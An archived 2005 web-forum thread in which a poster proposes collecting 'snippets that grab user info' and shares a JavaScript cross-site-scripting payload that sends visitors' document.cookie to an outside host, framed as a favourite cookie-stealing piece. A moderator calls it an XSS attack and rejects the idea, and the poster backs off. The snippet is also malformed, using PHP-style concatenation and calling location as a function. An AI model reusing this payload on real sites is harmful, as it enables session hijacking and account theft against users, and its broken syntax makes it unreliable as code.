Page 1 of 1
how 'bout a thread about snippets that grab user info
Posted: Tue Sep 20, 2005 8:04 am
by $var
This is one that i found in a htmlentities thread, and i like it.
It steals cookies... a la cookie monster.
Code: Select all
<script language="JavaScript">
window.location('http://www.cookiestealers.com/stealthosecookies.php?c='.document.cookie);
</script>
Posted: Tue Sep 20, 2005 8:14 am
by feyd
that's an XSS attack, that should be directed to the Security board.
Posted: Tue Sep 20, 2005 8:47 am
by $var
yah... i know it is... and it's on the security board...
i was going to post this thread in the security board,
but i thought that maybe we could make a thread of our favourite little pieces,
regardless of what they do.
I just thought that the snippets was more of a place to put pieces of code...
should we move the thread?
Posted: Tue Sep 20, 2005 8:51 am
by feyd
Favourite pieces? Most of us aren't in the habit of using XSS, we just understand where the holes are most often...
Posted: Tue Sep 20, 2005 8:57 am
by $var
i'm but wee in the land of code...
i know that anything that I can contribute is peanuts comparatively...
i'll just stick to asking questions for now.